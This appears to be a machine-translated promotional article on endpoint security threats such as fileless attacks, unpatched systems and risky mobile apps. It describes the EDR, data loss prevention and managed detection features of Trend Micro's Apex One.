When the walls are not enough. How to protect endpoints

Do you think the most important thing in a company is to ensure the security of the corporate network perimeter and server infrastructure? This is only partly true: to create a secure perimeter now is in principle impossible only if the company does not apply the strictest information security rules, “white list” of sites, only paper correspondence and sealing USB ports on computers, and they don’t allow reception at all. If this is not about your company, then keep in mind: today, the final risk devices are becoming the main risk zone, and antivirus alone is not enough to protect them. Yes, the antivirus will block the unpacking of the archive with a dangerous file, and the browser will prohibit visiting the compromised site, but there are many threats against which the basic protection packages are powerless. Then we will talk about some of them - and how to protect.

What can not handle the usual antivirus in the company

- Fileless attacks . Malicious PowerShell scripts that immediately fall into RAM cannot be detected by the antivirus at the system penetration stage — it is not executable programs, but simply a text command set that runs in an existing shell, like PowerShell. In order not to disappear when the computer is turned off, the Trojans register their commands in the registry.
')
It is impossible to detect a fileless attack using traditional methods - a trojan can store a malicious script, for example, in the TXT files of DNS resource records. According to Trend Micro 2018 Midyear Security Roundup , the number of fileless attacks in the world is growing: in January 2018, 24,430 incidents were recorded, and in June - more than 38 thousand.

- Exploits in non-updated OS . Operating system updates fix known vulnerabilities for which exploits can already be written. Before deploying updates on hundreds and thousands of computers, it is worth testing first — sometimes updates contain errors that cause some computers to temporarily fail. Putting the task of installing updates on the shoulders of users is a sure way to create a gap in the network through the fault of an optional or inept employee.

The acclaimed WannaCry and NotPetya used to spread the Windows vulnerability, which were closed for updates two months before the epidemic began: the first revision of WannaCry appeared on January 16, 2017, on March 14, Microsoft distributed a patch for the SMB protocol in all current versions of Windows, and the legendary epidemic began only 12 May. Penetrating on not updated users' computers, the extortioner spread inside corporate networks, paralyzing the activities of companies. Why hundreds of thousands of corporate computers in major companies for two months remained without a critical update of Windows - a serious question to the relevant services.

- Mobile devices . Despite checking applications before publishing in the Play Market and App Store, supposedly useful programs are often screwed with spies and even miners. For example, analysis of 283 VPN applications for Android revealed that 43% of them contain unwanted advertising, and 17% of ads have malicious functions, 29% are the source of Trojan modules, potentially dangerous software is contained in 6% of VPNs, and another 5% are spying for their users .

- Employees who do not know the basic principles of information security . The main hole in the information security of any company remains employees, or rather, their ignorance of the principles of information security . No virus can divert important information and documents with the same elegance and efficiency as an employee who downloads a program that is malicious as a result.

How to protect endpoints

The growing complexity of threats leads to the fact that traditional methods of protection become ineffective. Antivirus alone is not enough to prevent data leakage or intruders from entering the network, and installing several highly specialized solutions often leads to conflicts and errors. In addition, setting up and maintaining the joint work of several security programs is not an easy task. A comprehensive solution is required that will allow users to comfortably perform their work functions, but at the same time ensure the safety of the company's information assets.

The ideal protection complex should be:

• multiplatform - work on all popular desktop and mobile operating systems; This is especially important for companies with BYOD policies and the ability to work remotely;
• automatic - detect threats and respond to them without user intervention;
• Intelligent - use not only traditional signature-based, but also behavioral analysis, providing detection of both file and fileless malware;
• centrally managed — administrators should see the status of all protected devices in real time and be able to change the security settings depending on the location of the device;
• provide integration with behavioral analysis systems and the ability to investigate incidents;
• Control applications on end devices to protect the corporate network from the penetration of malicious programs and targeted attacks from devices in the organization’s network.

Traditional EPP (Endpoint Protection Platform) class solutions protect user devices from known threats well, but the latest types of attacks are much worse. They successfully cope with fixing incidents on separate devices, but, as a rule, are not able to reveal that these incidents are fragments of a complex, complex attack, which in the long run can cause serious damage to an organization. They have almost no opportunities to automatically analyze incidents. Therefore, companies have developed solutions class EDR (Endpoint Detection and Response).

How does a modern EDR solution work?

Let's take a look at how the endpoint security solution works with the example of Trend Micro's Apex One. This product is a significant rebirth of the already known OfficeScan endpoint security solution.

One of the key features of Apex One is just multi-stage protection of endpoints, which prevents malware from spreading over the network, affecting computer performance and stealing confidential data. The solution instantly blocks zero-day threats on physical and virtual desktops, as well as laptops, both online and offline.

What exactly does Apex One do?

- Protects against advanced threats:

• prevents the possibility of using known and unknown vulnerabilities to penetrate into the system before the release of patches;
• protects unsupported and outdated operating systems for which fix packs are no longer being released;
• automatically assesses risks and recommends activation of virtual patches required for each individual device;
• dynamically changes the security settings depending on the location of the device;
• Protects end devices with minimal impact on network bandwidth, user productivity and productivity.

- Blocks inappropriate network traffic:

• applies filters to notify on certain types of traffic and its blocking, for example, instant messages and video streaming;
• Uses deep packet inspection to identify traffic that may be malicious for applications.
• filters forbidden network traffic and checks allowed traffic by monitoring connection status;
• detects malicious traffic that is hidden through the use of well-known protocols on non-standard ports;
• prevents backdoors from entering the corporate network.

- Makes protection timely:

• provides protection until the release and installation of official patches;
• protects operating systems and typical applications from known and unknown attacks.

- Facilitates deployment and management of existing infrastructure:

• A simplified control panel makes it convenient to conduct detailed monitoring and monitoring of the environment, in the context of each individual user.
• Vulnerability assessments are conducted based on Microsoft security bulletins, CVE data, and other sources.

And now we will tell (and show) how it works.

All information about the state of endpoints, threats is collected in a single panel Apex Central. Analysts have the opportunity to detailed monitoring, in the context of each individual user, and policy management. A single panel allows you to control local, cloud and hybrid environments. It also provides access to operational information from the local sandbox or from the Trend Micro Smart Protection Network infrastructure, which uses cloud-based threat data from around the world and provides real-time information security by blocking threats before they reach computers.


A single panel allows you to not switch between control panels. Here you can see how integrated detection and response are reflected in a single manager. It also provides unified integration with EDR investigations, automated detection and response to the threat



Analysis of the scale of the consequences:

1. Malicious IP blocked because it has already been detected (red) (1)
2. "Zero patient." Unknown (orange) and was not blocked (2)
3. "Zero patient" is isolated and the search for the root cause begins (3)

Search for root causes using Trend Micro global threat information:

- Red (“bad”);
- Orange ("suspicious");
- Black (“satisfactory”)




There are reaction options:
-Stop execution;
-To disseminate information about the threat;
- Investigate


Endpoint Sensor from the Apex One package monitors the security status on the end device with context, registers actions at the system level and generates reports for security personnel so that you can quickly assess the extent of the attack on the network. Including Endpoint Sensor keeps track of advanced threats, such as the notorious fileless attacks. Using EDR, you can conduct a multi-level malware search on all end devices using criteria such as OpenIOC, Yara, and suspicious objects. Also provides protection against fileless attacks.

Even if the malware penetrated through server-side scanning systems, Trend Micro User Protection will examine the executable file prior to its launch using machine learning. When you start the behavior analysis begins on the basis of machine learning. Then the analysis in the sandbox takes place - according to the results of the checks, the application either starts its work or is blocked. Moreover, for security purposes, the entire computer can be automatically blocked to localize the malware and prevent it from penetrating the network.



Apex One uses Trend Micro Vulnerability Protection technology, which protects all network end devices from exploits, even if they are not updated with patches. To do this, Apex One centrally analyzes traffic for exploits / vulnerabilities, service attacks, web malware and illegal traffic. In this case, the scan takes place at high speed, the work of Apex One has virtually no effect on the speed of the network itself.

How leakage protection is provided

Another useful module in the Apex One solution is Data Loss Prevention. It monitors and controls the transfer of content across all possible communication channels to prevent data leakage. You can log or limit the use of USB drives, CD / DVD, exotic IR transmitters, PCMCIA devices, modems, cloud storage and mail servers. Data transfer is controlled both when working with the mail client, and through the web-based mail interface, in instant messengers and most network protocols, such as HTTP / HTTPS, FTP and SMTP.

Data Loss Protection has templates for recognizing more than three hundred file types, including archives, and the rest of the data types are determined by specific patterns, formulas and locations. You can also create a data identifier yourself.
And finally, protection from the “smartest” controls the clipboard, pasting from it and the screen captures. After proper configuration of Data Loss Protection, the probability that valuable data will be removed from a company is significantly reduced.

Bonus: MDR - subscription security service

Under current conditions, the content of a large information security team is becoming a luxury. At the same time, it is extremely important to correctly assess the damage caused by a cyber attack, to formulate a plan of measures to eliminate the threat and prevent repeated attacks - the staff left after “optimization” will hardly find time for such investigations.

Here Trend Micro Managed Detection and Response comes to the rescue - a threat management and response management service that is part of Apex One. MDR is a remote team of Trend Micro professionals who can monitor customer security around the clock. This is an excellent solution for those companies that do not have the ability to maintain a large staff of security guards or there is a shortage of highly competent employees.

The MDR service monitors the logs, identifying critical notifications, examines them and informs the customer of the threat information. Using the data of the end points, the MDR group will detect the root causes and attack vector, as well as evaluate its consequences. The customer can always ask questions to the team of experts to get clarifications and explanations. The MDR will draw up a detailed action plan for recovering the network after an attack.

The subscription includes tracking of both endpoints and networks, servers, even printers and the Internet of things.

In essence, Trend Micro MDR is doing everything that professional staffed information security departments do. But remotely, around the clock and by subscription.